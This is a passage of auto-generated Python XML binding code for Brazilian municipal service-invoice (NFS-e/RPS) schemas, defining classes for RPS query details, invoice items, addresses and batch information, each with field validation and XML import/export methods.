warnings_.warn('Value "%(value)s" does not match xsd enumeration restriction on tpSerieRPS' % {"value" : value.encode("utf-8")} )
def validate_tpNumero(self, value):
# Validate type tpNumero, a restriction on xs:long.
if value is not None and Validate_simpletypes_:
if value < 0:
warnings_.warn('Value "%(value)s" does not match xsd minInclusive restriction on tpNumero' % {"value" : value} )
if value > 2147483647:
warnings_.warn('Value "%(value)s" does not match xsd maxInclusive restriction on tpNumero' % {"value" : value} )
if not self.gds_validate_simple_patterns(
self.validate_tpNumero_patterns_, value):
warnings_.warn('Value "%s" does not match xsd pattern restrictions: %s' % (value.encode('utf-8'), self.validate_tpNumero_patterns_, ))
validate_tpNumero_patterns_ = [['^[0-9]{1,12}$']]
def hasContent_(self):
if (
self.InscricaoPrestador is not None or
self.SerieRPS is not None or
self.NumeroRPS is not None
):
return True
else:
return False
def export(self, outfile, level, namespace_='ns1:', name_='tpDetalhesConsultaRPS', namespacedef_='', pretty_print=True):
imported_ns_def_ = GenerateDSNamespaceDefs_.get('tpDetalhesConsultaRPS')
if imported_ns_def_ is not None:
namespacedef_ = imported_ns_def_
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
if self.original_tagname_ is not None:
name_ = self.original_tagname_
showIndent(outfile, level, pretty_print)
outfile.write('<%s%s%s' % (namespace_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
already_processed = set()
self.exportAttributes(outfile, level, already_processed, namespace_, name_='tpDetalhesConsultaRPS')
if self.hasContent_():
outfile.write('>%s' % (eol_, ))
self.exportChildren(outfile, level + 1, namespace_='ns1:', name_='tpDetalhesConsultaRPS', pretty_print=pretty_print)
showIndent(outfile, level, pretty_print)
outfile.write('</%s%s>%s' % (namespace_, name_, eol_))
else:
outfile.write('/>%s' % (eol_, ))
def exportAttributes(self, outfile, level, already_processed, namespace_='ns1:', name_='tpDetalhesConsultaRPS'):
pass
def exportChildren(self, outfile, level, namespace_='ns1:', name_='tpDetalhesConsultaRPS', fromsubclass_=False, pretty_print=True):
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
if self.InscricaoPrestador is not None:
showIndent(outfile, level, pretty_print)
outfile.write('<ns1:InscricaoPrestador>%s</ns1:InscricaoPrestador>%s' % (self.gds_format_integer(self.InscricaoPrestador, input_name='InscricaoPrestador'), eol_))
if self.SerieRPS is not None:
showIndent(outfile, level, pretty_print)
outfile.write('<ns1:SerieRPS>%s</ns1:SerieRPS>%s' % (self.gds_encode(self.gds_format_string(quote_xml(self.SerieRPS), input_name='SerieRPS')), eol_))
if self.NumeroRPS is not None:
showIndent(outfile, level, pretty_print)
outfile.write('<ns1:NumeroRPS>%s</ns1:NumeroRPS>%s' % (self.gds_format_integer(self.NumeroRPS, input_name='NumeroRPS'), eol_))
def build(self, node):
already_processed = set()
self.buildAttributes(node, node.attrib, already_processed)
for child in node:
nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
self.buildChildren(child, node, nodeName_)
return self
def buildAttributes(self, node, attrs, already_processed):
pass
def buildChildren(self, child_, node, nodeName_, fromsubclass_=False):
if nodeName_ == 'InscricaoPrestador':
sval_ = child_.text
try:
ival_ = int(sval_)
except (TypeError, ValueError) as exp:
raise_parse_error(child_, 'requires integer: %s' % exp)
ival_ = self.gds_validate_integer(ival_, node, 'InscricaoPrestador')
self.InscricaoPrestador = ival_
# validate type tpInscricaoMunicipal
self.validate_tpInscricaoMunicipal(self.InscricaoPrestador)
elif nodeName_ == 'SerieRPS':
SerieRPS_ = child_.text
SerieRPS_ = self.gds_validate_string(SerieRPS_, node, 'SerieRPS')
self.SerieRPS = SerieRPS_
# validate type tpSerieRPS
self.validate_tpSerieRPS(self.SerieRPS)
elif nodeName_ == 'NumeroRPS':
sval_ = child_.text
try:
ival_ = int(sval_)
except (TypeError, ValueError) as exp:
raise_parse_error(child_, 'requires integer: %s' % exp)
ival_ = self.gds_validate_integer(ival_, node, 'NumeroRPS')
self.NumeroRPS = ival_
# validate type tpNumero
self.validate_tpNumero(self.NumeroRPS)
# end class tpDetalhesConsultaRPS
class tpItens(GeneratedsSuper):
"""Tipo Itens de Nota Fiscal."""
subclass = None
superclass = None
def __init__(self, DiscriminacaoServico=None, Quantidade=None, ValorUnitario=None, ValorTotal=None, Tributavel=None):
self.original_tagname_ = None
self.DiscriminacaoServico = DiscriminacaoServico
self.validate_tpDiscriminacao(self.DiscriminacaoServico)
self.Quantidade = Quantidade
self.validate_tpQuantidade(self.Quantidade)
self.ValorUnitario = ValorUnitario
self.validate_tpValor4d(self.ValorUnitario)
self.ValorTotal = ValorTotal
self.validate_tpValor(self.ValorTotal)
self.Tributavel = Tributavel
self.validate_tpItemTributavel(self.Tributavel)
def factory(*args_, **kwargs_):
if CurrentSubclassModule_ is not None:
subclass = getSubclassFromModule_(
CurrentSubclassModule_, tpItens)
if subclass is not None:
return subclass(*args_, **kwargs_)
if tpItens.subclass:
return tpItens.subclass(*args_, **kwargs_)
else:
return tpItens(*args_, **kwargs_)
factory = staticmethod(factory)
def validate_tpDiscriminacao(self, value):
# Validate type tpDiscriminacao, a restriction on xs:string.
if value is not None and Validate_simpletypes_:
if len(value) > 250:
warnings_.warn('Value "%(value)s" does not match xsd maxLength restriction on tpDiscriminacao' % {"value" : value.encode("utf-8")} )
if len(value) < 1:
warnings_.warn('Value "%(value)s" does not match xsd minLength restriction on tpDiscriminacao' % {"value" : value.encode("utf-8")} )
def validate_tpQuantidade(self, value):
# Validate type tpQuantidade, a restriction on xs:decimal.
if value is not None and Validate_simpletypes_:
if value < 0:
warnings_.warn('Value "%(value)s" does not match xsd minInclusive restriction on tpQuantidade' % {"value" : value} )
if len(str(value)) >= 10:
warnings_.warn('Value "%(value)s" does not match xsd maxInclusive restriction on tpQuantidade' % {"value" : value} )
def validate_tpValor4d(self, value):
# Validate type tpValor4d, a restriction on xs:decimal.
if value is not None and Validate_simpletypes_:
if value < 0:
warnings_.warn('Value "%(value)s" does not match xsd minInclusive restriction on tpValor4d' % {"value" : value} )
if len(str(value)) >= 15:
warnings_.warn('Value "%(value)s" does not match xsd maxInclusive restriction on tpValor4d' % {"value" : value} )
def validate_tpValor(self, value):
# Validate type tpValor, a restriction on xs:decimal.
if value is not None and Validate_simpletypes_:
if value < 0:
warnings_.warn('Value "%(value)s" does not match xsd minInclusive restriction on tpValor' % {"value" : value} )
if len(str(value)) >= 15:
warnings_.warn('Value "%(value)s" does not match xsd maxInclusive restriction on tpValor' % {"value" : value} )
if not self.gds_validate_simple_patterns(
self.validate_tpValor_patterns_, value):
warnings_.warn('Value "%s" does not match xsd pattern restrictions: %s' % (value.encode('utf-8'), self.validate_tpValor_patterns_, ))
validate_tpValor_patterns_ = [['^0$|^0\\.[0-9]{2}$|^[1-9]{1}[0-9]{0,12}(\\.[0-9]{0,2})?$']]
def validate_tpItemTributavel(self, value):
# Validate type tpItemTributavel, a restriction on xs:string.
if value is not None and Validate_simpletypes_:
value = str(value)
enumerations = ['S', 'N']
enumeration_respectee = False
for enum in enumerations:
if value == enum:
enumeration_respectee = True
break
if not enumeration_respectee:
warnings_.warn('Value "%(value)s" does not match xsd enumeration restriction on tpItemTributavel' % {"value" : value.encode("utf-8")} )
def hasContent_(self):
if (
self.DiscriminacaoServico is not None or
self.Quantidade is not None or
self.ValorUnitario is not None or
self.ValorTotal is not None or
self.Tributavel is not None
):
return True
else:
return False
def export(self, outfile, level, namespace_='ns1:', name_='tpItens', namespacedef_='', pretty_print=True):
imported_ns_def_ = GenerateDSNamespaceDefs_.get('tpItens')
if imported_ns_def_ is not None:
namespacedef_ = imported_ns_def_
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
if self.original_tagname_ is not None:
name_ = self.original_tagname_
showIndent(outfile, level, pretty_print)
outfile.write('<%s%s%s' % (namespace_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
already_processed = set()
self.exportAttributes(outfile, level, already_processed, namespace_, name_='tpItens')
if self.hasContent_():
outfile.write('>%s' % (eol_, ))
self.exportChildren(outfile, level + 1, namespace_='ns1:', name_='tpItens', pretty_print=pretty_print)
showIndent(outfile, level, pretty_print)
outfile.write('</%s%s>%s' % (namespace_, name_, eol_))
else:
outfile.write('/>%s' % (eol_, ))
def exportAttributes(self, outfile, level, already_processed, namespace_='ns1:', name_='tpItens'):
pass
def exportChildren(self, outfile, level, namespace_='ns1:', name_='tpItens', fromsubclass_=False, pretty_print=True):
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
if self.DiscriminacaoServico is not None:
showIndent(outfile, level, pretty_print)
outfile.write('<ns1:DiscriminacaoServico>%s</ns1:DiscriminacaoServico>%s' % (self.gds_encode(self.gds_format_string(quote_xml(self.DiscriminacaoServico), input_name='DiscriminacaoServico')), eol_))
if self.Quantidade is not None:
showIndent(outfile, level, pretty_print)
outfile.write('<ns1:Quantidade>%s</ns1:Quantidade>%s' % (self.gds_format_float(self.Quantidade, input_name='Quantidade'), eol_))
if self.ValorUnitario is not None:
showIndent(outfile, level, pretty_print)
outfile.write('<ns1:ValorUnitario>%s</ns1:ValorUnitario>%s' % (self.gds_format_float(self.ValorUnitario, input_name='ValorUnitario'), eol_))
if self.ValorTotal is not None:
showIndent(outfile, level, pretty_print)
outfile.write('<ns1:ValorTotal>%s</ns1:ValorTotal>%s' % (self.gds_format_float(self.ValorTotal, input_name='ValorTotal'), eol_))
if self.Tributavel is not None:
showIndent(outfile, level, pretty_print)
outfile.write('<ns1:Tributavel>%s</ns1:Tributavel>%s' % (self.gds_encode(self.gds_format_string(quote_xml(self.Tributavel), input_name='Tributavel')), eol_))
def build(self, node):
already_processed = set()
self.buildAttributes(node, node.attrib, already_processed)
for child in node:
nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
self.buildChildren(child, node, nodeName_)
return self
def buildAttributes(self, node, attrs, already_processed):
pass
def buildChildren(self, child_, node, nodeName_, fromsubclass_=False):
if nodeName_ == 'DiscriminacaoServico':
DiscriminacaoServico_ = child_.text
DiscriminacaoServico_ = self.gds_validate_string(DiscriminacaoServico_, node, 'DiscriminacaoServico')
self.DiscriminacaoServico = DiscriminacaoServico_
# validate type tpDiscriminacao
self.validate_tpDiscriminacao(self.DiscriminacaoServico)
elif nodeName_ == 'Quantidade':
sval_ = child_.text
try:
fval_ = float(sval_)
except (TypeError, ValueError) as exp:
raise_parse_error(child_, 'requires float or double: %s' % exp)
fval_ = self.gds_validate_float(fval_, node, 'Quantidade')
self.Quantidade = fval_
# validate type tpQuantidade
self.validate_tpQuantidade(self.Quantidade)
elif nodeName_ == 'ValorUnitario':
sval_ = child_.text
try:
fval_ = float(sval_)
except (TypeError, ValueError) as exp:
raise_parse_error(child_, 'requires float or double: %s' % exp)
fval_ = self.gds_validate_float(fval_, node, 'ValorUnitario')
self.ValorUnitario = fval_
# validate type tpValor4d
self.validate_tpValor4d(self.ValorUnitario)
elif nodeName_ == 'ValorTotal':
sval_ = child_.text
try:
fval_ = float(sval_)
except (TypeError, ValueError) as exp:
raise_parse_error(child_, 'requires float or double: %s' % exp)
fval_ = self.gds_validate_float(fval_, node, 'ValorTotal')
self.ValorTotal = fval_
# validate type tpValor
self.validate_tpValor(self.ValorTotal)
elif nodeName_ == 'Tributavel':
Tributavel_ = child_.text
Tributavel_ = self.gds_validate_string(Tributavel_, node, 'Tributavel')
self.Tributavel = Tributavel_
# validate type tpItemTributavel
self.validate_tpItemTributavel(self.Tributavel)
# end class tpItens
class tpEndereco(GeneratedsSuper):
"""Tipo Endereço."""
subclass = None
superclass = None
def __init__(self, TipoLogradouro=None, Logradouro=None, NumeroEndereco=None, ComplementoEndereco=None, TipoBairro=None, Bairro=None, Cidade=None, UF=None, CEP=None):
self.original_tagname_ = None
self.TipoLogradouro = TipoLogradouro
self.validate_tpTipoLogradouro(self.TipoLogradouro)
self.Logradouro = Logradouro
self.validate_tpLogradouro(self.Logradouro)
self.NumeroEndereco = NumeroEndereco
self.validate_tpNumeroEndereco(self.NumeroEndereco)
self.ComplementoEndereco = ComplementoEndereco
self.validate_tpComplementoEndereco(self.ComplementoEndereco)
self.TipoBairro = TipoBairro
self.validate_tpTipoBairro(self.TipoBairro)
self.Bairro = Bairro
self.validate_tpBairro(self.Bairro)
self.Cidade = Cidade
self.validate_tpCidade(self.Cidade)
self.UF = UF
self.validate_tpUF(self.UF)
self.CEP = CEP
self.validate_tpCEP(self.CEP)
def factory(*args_, **kwargs_):
if CurrentSubclassModule_ is not None:
subclass = getSubclassFromModule_(
CurrentSubclassModule_, tpEndereco)
if subclass is not None:
return subclass(*args_, **kwargs_)
if tpEndereco.subclass:
return tpEndereco.subclass(*args_, **kwargs_)
else:
return tpEndereco(*args_, **kwargs_)
factory = staticmethod(factory)
def validate_tpTipoLogradouro(self, value):
# Validate type tpTipoLogradouro, a restriction on xs:string.
if value is not None and Validate_simpletypes_:
if len(value) > 10:
warnings_.warn('Value "%(value)s" does not match xsd maxLength restriction on tpTipoLogradouro' % {"value" : value.encode("utf-8")} )
if len(value) < 0:
warnings_.warn('Value "%(value)s" does not match xsd minLength restriction on tpTipoLogradouro' % {"value" : value.encode("utf-8")} )
def validate_tpLogradouro(self, value):
# Validate type tpLogradouro, a restriction on xs:string.
if value is not None and Validate_simpletypes_:
if len(value) > 50:
warnings_.warn('Value "%(value)s" does not match xsd maxLength restriction on tpLogradouro' % {"value" : value.encode("utf-8")} )
if len(value) < 0:
warnings_.warn('Value "%(value)s" does not match xsd minLength restriction on tpLogradouro' % {"value" : value.encode("utf-8")} )
def validate_tpNumeroEndereco(self, value):
# Validate type tpNumeroEndereco, a restriction on xs:string.
if value is not None and Validate_simpletypes_:
if len(value) > 9:
warnings_.warn('Value "%(value)s" does not match xsd maxLength restriction on tpNumeroEndereco' % {"value" : value.encode("utf-8")} )
if len(value) < 0:
warnings_.warn('Value "%(value)s" does not match xsd minLength restriction on tpNumeroEndereco' % {"value" : value.encode("utf-8")} )
def validate_tpComplementoEndereco(self, value):
# Validate type tpComplementoEndereco, a restriction on xs:string.
if value is not None and Validate_simpletypes_:
if len(value) > 30:
warnings_.warn('Value "%(value)s" does not match xsd maxLength restriction on tpComplementoEndereco' % {"value" : value.encode("utf-8")} )
if len(value) < 0:
warnings_.warn('Value "%(value)s" does not match xsd minLength restriction on tpComplementoEndereco' % {"value" : value.encode("utf-8")} )
def validate_tpTipoBairro(self, value):
# Validate type tpTipoBairro, a restriction on xs:string.
if value is not None and Validate_simpletypes_:
if len(value) > 10:
warnings_.warn('Value "%(value)s" does not match xsd maxLength restriction on tpTipoBairro' % {"value" : value.encode("utf-8")} )
if len(value) < 0:
warnings_.warn('Value "%(value)s" does not match xsd minLength restriction on tpTipoBairro' % {"value" : value.encode("utf-8")} )
def validate_tpBairro(self, value):
# Validate type tpBairro, a restriction on xs:string.
if value is not None and Validate_simpletypes_:
if len(value) > 50:
warnings_.warn('Value "%(value)s" does not match xsd maxLength restriction on tpBairro' % {"value" : value.encode("utf-8")} )
if len(value) < 0:
warnings_.warn('Value "%(value)s" does not match xsd minLength restriction on tpBairro' % {"value" : value.encode("utf-8")} )
def validate_tpCidade(self, value):
# Validate type tpCidade, a restriction on xs:unsignedInt.
if value is not None and Validate_simpletypes_:
if not self.gds_validate_simple_patterns(
self.validate_tpCidade_patterns_, value):
warnings_.warn('Value "%s" does not match xsd pattern restrictions: %s' % (value.encode('utf-8'), self.validate_tpCidade_patterns_, ))
validate_tpCidade_patterns_ = [['^[0-9]$']]
def validate_tpUF(self, value):
# Validate type tpUF, a restriction on xs:string.
if value is not None and Validate_simpletypes_:
if len(value) > 2:
warnings_.warn('Value "%(value)s" does not match xsd maxLength restriction on tpUF' % {"value" : value.encode("utf-8")} )
if len(value) < 2:
warnings_.warn('Value "%(value)s" does not match xsd minLength restriction on tpUF' % {"value" : value.encode("utf-8")} )
def validate_tpCEP(self, value):
# Validate type tpCEP, a restriction on xs:int.
if value is not None and Validate_simpletypes_:
if not self.gds_validate_simple_patterns(
self.validate_tpCEP_patterns_, value):
warnings_.warn('Value "%s" does not match xsd pattern restrictions: %s' % (value.encode('utf-8'), self.validate_tpCEP_patterns_, ))
validate_tpCEP_patterns_ = [['^[0-9]{0,8}$']]
def hasContent_(self):
if (
self.TipoLogradouro is not None or
self.Logradouro is not None or
self.NumeroEndereco is not None or
self.ComplementoEndereco is not None or
self.TipoBairro is not None or
self.Bairro is not None or
self.Cidade is not None or
self.UF is not None or
self.CEP is not None
):
return True
else:
return False
def export(self, outfile, level, namespace_='ns1:', name_='tpEndereco', namespacedef_='', pretty_print=True):
imported_ns_def_ = GenerateDSNamespaceDefs_.get('tpEndereco')
if imported_ns_def_ is not None:
namespacedef_ = imported_ns_def_
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
if self.original_tagname_ is not None:
name_ = self.original_tagname_
showIndent(outfile, level, pretty_print)
outfile.write('<%s%s%s' % (namespace_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
already_processed = set()
self.exportAttributes(outfile, level, already_processed, namespace_, name_='tpEndereco')
if self.hasContent_():
outfile.write('>%s' % (eol_, ))
self.exportChildren(outfile, level + 1, namespace_='ns1:', name_='tpEndereco', pretty_print=pretty_print)
showIndent(outfile, level, pretty_print)
outfile.write('</%s%s>%s' % (namespace_, name_, eol_))
else:
outfile.write('/>%s' % (eol_, ))
def exportAttributes(self, outfile, level, already_processed, namespace_='ns1:', name_='tpEndereco'):
pass
def exportChildren(self, outfile, level, namespace_='ns1:', name_='tpEndereco', fromsubclass_=False, pretty_print=True):
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
if self.TipoLogradouro is not None:
showIndent(outfile, level, pretty_print)
outfile.write('<ns1:TipoLogradouro>%s</ns1:TipoLogradouro>%s' % (self.gds_encode(self.gds_format_string(quote_xml(self.TipoLogradouro), input_name='TipoLogradouro')), eol_))
if self.Logradouro is not None:
showIndent(outfile, level, pretty_print)
outfile.write('<ns1:Logradouro>%s</ns1:Logradouro>%s' % (self.gds_encode(self.gds_format_string(quote_xml(self.Logradouro), input_name='Logradouro')), eol_))
if self.NumeroEndereco is not None:
showIndent(outfile, level, pretty_print)
outfile.write('<ns1:NumeroEndereco>%s</ns1:NumeroEndereco>%s' % (self.gds_encode(self.gds_format_string(quote_xml(self.NumeroEndereco), input_name='NumeroEndereco')), eol_))
if self.ComplementoEndereco is not None:
showIndent(outfile, level, pretty_print)
outfile.write('<ns1:ComplementoEndereco>%s</ns1:ComplementoEndereco>%s' % (self.gds_encode(self.gds_format_string(quote_xml(self.ComplementoEndereco), input_name='ComplementoEndereco')), eol_))
if self.TipoBairro is not None:
showIndent(outfile, level, pretty_print)
outfile.write('<ns1:TipoBairro>%s</ns1:TipoBairro>%s' % (self.gds_encode(self.gds_format_string(quote_xml(self.TipoBairro), input_name='TipoBairro')), eol_))
if self.Bairro is not None:
showIndent(outfile, level, pretty_print)
outfile.write('<ns1:Bairro>%s</ns1:Bairro>%s' % (self.gds_encode(self.gds_format_string(quote_xml(self.Bairro), input_name='Bairro')), eol_))
if self.Cidade is not None:
showIndent(outfile, level, pretty_print)
outfile.write('<ns1:Cidade>%s</ns1:Cidade>%s' % (self.gds_format_integer(self.Cidade, input_name='Cidade'), eol_))
if self.UF is not None:
showIndent(outfile, level, pretty_print)
outfile.write('<ns1:UF>%s</ns1:UF>%s' % (self.gds_encode(self.gds_format_string(quote_xml(self.UF), input_name='UF')), eol_))
if self.CEP is not None:
showIndent(outfile, level, pretty_print)
outfile.write('<ns1:CEP>%s</ns1:CEP>%s' % (self.gds_format_integer(self.CEP, input_name='CEP'), eol_))
def build(self, node):
already_processed = set()
self.buildAttributes(node, node.attrib, already_processed)
for child in node:
nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
self.buildChildren(child, node, nodeName_)
return self
def buildAttributes(self, node, attrs, already_processed):
pass
def buildChildren(self, child_, node, nodeName_, fromsubclass_=False):
if nodeName_ == 'TipoLogradouro':
TipoLogradouro_ = child_.text
TipoLogradouro_ = self.gds_validate_string(TipoLogradouro_, node, 'TipoLogradouro')
self.TipoLogradouro = TipoLogradouro_
# validate type tpTipoLogradouro
self.validate_tpTipoLogradouro(self.TipoLogradouro)
elif nodeName_ == 'Logradouro':
Logradouro_ = child_.text
Logradouro_ = self.gds_validate_string(Logradouro_, node, 'Logradouro')
self.Logradouro = Logradouro_
# validate type tpLogradouro
self.validate_tpLogradouro(self.Logradouro)
elif nodeName_ == 'NumeroEndereco':
NumeroEndereco_ = child_.text
NumeroEndereco_ = self.gds_validate_string(NumeroEndereco_, node, 'NumeroEndereco')
self.NumeroEndereco = NumeroEndereco_
# validate type tpNumeroEndereco
self.validate_tpNumeroEndereco(self.NumeroEndereco)
elif nodeName_ == 'ComplementoEndereco':
ComplementoEndereco_ = child_.text
ComplementoEndereco_ = self.gds_validate_string(ComplementoEndereco_, node, 'ComplementoEndereco')
self.ComplementoEndereco = ComplementoEndereco_
# validate type tpComplementoEndereco
self.validate_tpComplementoEndereco(self.ComplementoEndereco)
elif nodeName_ == 'TipoBairro':
TipoBairro_ = child_.text
TipoBairro_ = self.gds_validate_string(TipoBairro_, node, 'TipoBairro')
self.TipoBairro = TipoBairro_
# validate type tpTipoBairro
self.validate_tpTipoBairro(self.TipoBairro)
elif nodeName_ == 'Bairro':
Bairro_ = child_.text
Bairro_ = self.gds_validate_string(Bairro_, node, 'Bairro')
self.Bairro = Bairro_
# validate type tpBairro
self.validate_tpBairro(self.Bairro)
elif nodeName_ == 'Cidade':
sval_ = child_.text
try:
ival_ = int(sval_)
except (TypeError, ValueError) as exp:
raise_parse_error(child_, 'requires integer: %s' % exp)
ival_ = self.gds_validate_integer(ival_, node, 'Cidade')
self.Cidade = ival_
# validate type tpCidade
self.validate_tpCidade(self.Cidade)
elif nodeName_ == 'UF':
UF_ = child_.text
UF_ = self.gds_validate_string(UF_, node, 'UF')
self.UF = UF_
# validate type tpUF
self.validate_tpUF(self.UF)
elif nodeName_ == 'CEP':
sval_ = child_.text
try:
ival_ = int(sval_)
except (TypeError, ValueError) as exp:
raise_parse_error(child_, 'requires integer: %s' % exp)
ival_ = self.gds_validate_integer(ival_, node, 'CEP')
self.CEP = ival_
# validate type tpCEP
self.validate_tpCEP(self.CEP)
# end class tpEndereco
class tpInformacoesLote(GeneratedsSuper):
"""Informações do lote processado."""
subclass = None
superclass = None
def __init__(self, NumeroLote=None, InscricaoPrestador=None, CPFCNPJRemetente=None, DataEnvioLote=None, QtdNotasProcessadas=None, TempoProcessamento=None, ValorTotalServicos=None, ValorTotalDeducoes=None):
self.original_tagname_ = None
self.NumeroLote = NumeroLote
self.validate_tpNumero(self.NumeroLote)
self.InscricaoPrestador = InscricaoPrestador
self.validate_tpInscricaoMunicipal(self.InscricaoPrestador)
self.CPFCNPJRemetente = CPFCNPJRemetente
self.validate_tpCPFCNPJ(self.CPFCNPJRemetente)
if isinstance(DataEnvioLote, BaseStrType_):
initvalue_ = datetime_.datetime.strptime(DataEnvioLote, '%Y-%m-%dT%H:%M:%S')
else:
initvalue_ = DataEnvioLote
self.DataEnvioLote = initvalue_
self.QtdNotasProcessadas = QtdNotasProcessadas
self.validate_tpQuantidade(self.QtdNotasProcessadas)
self.TempoProcessamento = TempoProcessamento
self.validate_tpTempoProcessamento(self.TempoProcessamento)
self.ValorTotalServicos = ValorTotalServicos
self.validate_tpValor(self.ValorTotalServicos)
self.ValorTotalDeducoes = ValorTotalDeducoes
self.validate_tpValor(self.ValorTotalDeducoes)
def factory(*args_, **kwargs_):
if CurrentSubclassModule_ is not None:
subclass = getSubclassFromModule_(
CurrentSubclassModule_, tpInformacoesLote)
if subclass is not None:
return subclass(*args_, **kwargs_)
if tpInformacoesLote.subclass:
return tpInformacoesLote.subclass(*args_, **kwargs_)
else:
return tpInformacoesLote(*args_, **kwargs_)
factory = staticmethod(factory)
def validate_tpNumero(self, value):
# Validate type tpNumero, a restriction on xs:long.
if value is not None and Validate_simpletypes_:
if value < 0:
warnings_.warn('Value "%(value)s" does not match xsd minInclusive restriction on tpNumero' % {"value" : value} )
if value > 2147483647:
warnings_.warn('Value "%(value)s" does not match xsd maxInclusive restriction on tpNumero' % {"value" : value} )
if not self.gds_validate_simple_patterns(
self.validate_tpNumero_patterns_, value):
warnings_.warn('Value "%s" does not match xsd pattern restrictions: %s' % (value.encode('utf-8'), self.validate_tpNumero_patterns_, ))
validate_tpNumero_patterns_ = [['^[0-9]{1,12}$']]
def validate_tpInscricaoMunicipal(self, value):
# Validate type tpInscricaoMunicipal, a restriction on xs:long.
if value is not None and Validate_simpletypes_:
if not self.gds_validate_simple_patterns(
self.validate_tpInscricaoMunicipal_patterns_, value):
warnings_.warn('Value "%s" does not match xsd pattern restrictions: %s' % (value.encode('utf-8'), self.validate_tpInscricaoMunicipal_patterns_, ))
validate_tpInscricaoMunicipal_patterns_ = [['^[0-9]{6,11}$']]
def validate_tpCPFCNPJ(self, value):
# Validate type tpCPFCNPJ, a restriction on xs:string.
if value is not None and Validate_simpletypes_:
if not self.gds_validate_simple_patterns(
self.validate_tpCPFCNPJ_patterns_, value):
warnings_.warn('Value "%s" does not match xsd pattern restrictions: %s' % (value.encode('utf-8'), self.validate_tpCPFCNPJ_patterns_, ))
validate_tpCPFCNPJ_patterns_ = [['^[0-9]{11}$|^[0-9]{14}$']]
def validate_tpQuantidade(self, value):
# Validate type tpQuantidade, a restriction on xs:decimal.
if value is not None and Validate_simpletypes_:
if value < 0:
warnings_.warn('Value "%(value)s" does not match xsd minInclusive restriction on tpQuantidade' % {"value" : value} )
if len(str(value)) >= 10:
warnings_.warn('Value "%(value)s" does not match xsd maxInclusive restriction on tpQuantidade' % {"value" : value} )
def validate_tpTempoProcessamento(self, value):
# Validate type tpTempoProcessamento, a restriction on xs:long.
if value is not None and Validate_simpletypes_:
if not self.gds_validate_simple_patterns(
self.validate_tpTempoProcessamento_patterns_, value):
warnings_.warn('Value "%s" does not match xsd pattern restrictions: %s' % (value.encode('utf-8'), self.validate_tpTempoProcessamento_patterns_, ))
validate_tpTempoProcessamento_patterns_ = [['^[0-9]{1,15}$']]
def validate_tpValor(self, value):
# Validate type tpValor, a restriction on xs:decimal.
if value is not None and Validate_simpletypes_:
if value < 0:
warnings_.warn('Value "%(value)s" does not match xsd minInclusive restriction on tpValor' % {"value" : value} )
if len(str(value)) >= 15:
warnings_.warn('Value "%(value)s" does not match xsd maxInclusive restriction on tpValor' % {"value" : value} )
if not self.gds_validate_simple_patterns(
self.validate_tpValor_patterns_, value):
warnings_.warn('Value "%s" does not match xsd pattern restrictions: %s' % (value.encode('utf-8'), self.validate_tpValor_patterns_, ))
validate_tpValor_patterns_ = [['^0$|^0\\.[0-9]{2}$|^[1-9]{1}[0-9]{0,12}(\\.[0-9]{0,2})?$']]
def hasContent_(self):
if (
self.NumeroLote is not None or
self.InscricaoPrestador is not None or
self.CPFCNPJRemetente is not None or
self.DataEnvioLote is not None or
self.QtdNotasProcessadas is not None or
self.TempoProcessamento is not None or
self.ValorTotalServicos is not None or
self.ValorTotalDeducoes is not None
):
return True
else:
return False
def export(self, outfile, level, namespace_='ns1:', name_='tpInformacoesLote', namespacedef_='', pretty_print=True):
imported_ns_def_ = GenerateDSNamespaceDefs_.get('tpInformacoesLote')
if imported_ns_def_ is not None:
namespacedef_ = imported_ns_def_
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
if self.original_tagname_ is not None:
name_ = self.original_tagname_
showIndent(outfile, level, pretty_print)
outfile.write('<%s%s%s' % (namespace_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
already_processed = set()
self.exportAttributes(outfile, level, already_processed, namespace_, name_='tpInformacoesLote')
if self.hasContent_():
outfile.write('>%s' % (eol_, ))
self.exportChildren(outfile, level + 1, namespace_='ns1:', name_='tpInformacoesLote', pretty_print=pretty_print)
showIndent(outfile, level, pretty_print)
outfile.write('</%s%s>%s' % (namespace_, name_, eol_))
else:
outfile.write('/>%s' % (eol_, ))
def exportAttributes(self, outfile, level, already_processed, namespace_='ns1:', name_='tpInformacoesLote'):
pass
def exportChildren(self, outfile, level, namespace_='ns1:', name_='tpInformacoesLote', fromsubclass_=False, pretty_print=True):
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
if self.NumeroLote is not None:
showIndent(outfile, level, pretty_print)
outfile.write('<ns1:NumeroLote>%s</ns1:NumeroLote>%s' % (self.gds_format_integer(self.NumeroLote, input_name='NumeroLote'), eol_))
if self.InscricaoPrestador is not None:
showIndent(outfile, level, pretty_print)
outfile.write('<ns1:InscricaoPrestador>%s</ns1:InscricaoPrestador>%s' % (self.gds_format_integer(self.InscricaoPrestador, input_name='InscricaoPrestador'), eol_))
if self.CPFCNPJRemetente is not None:
showIndent(outfile, level, pretty_print)
outfile.write('<ns1:CPFCNPJRemetente>%s</ns1:CPFCNPJRemetente>%s' % (self.gds_encode(self.gds_format_string(quote_xml(self.CPFCNPJRemetente), input_name='CPFCNPJRemetente')), eol_))
if self.DataEnvioLote is not None:
showIndent(outfile, level, pretty_print)
outfile.write('<ns1:DataEnvioLote>%s</ns1:DataEnvioLote>%s' % (self.gds_format_datetime(self.DataEnvioLote, input_name='DataEnvioLote'), eol_))
if self.QtdNotasProcessadas is not None:
showIndent(outfile, level, pretty_print)
outfile.write('<ns1:QtdNotasProcessadas>%s</ns1:QtdNotasProcessadas>%s' % (self.gds_format_float(self.QtdNotasProcessadas, input_name='QtdNotasProcessadas'), eol_))
if self.TempoProcessamento is not None:
showIndent(outfile, level, pretty_print)
outfile.write('<ns1:TempoProcessamento>%s</ns1:TempoProcessamento>%s' % (self.gds_format_integer(self.TempoProcessamento, input_name='TempoProcessamento'), eol_))
if self.ValorTotalServicos is not None:
showIndent(outfile, level, pretty_print)
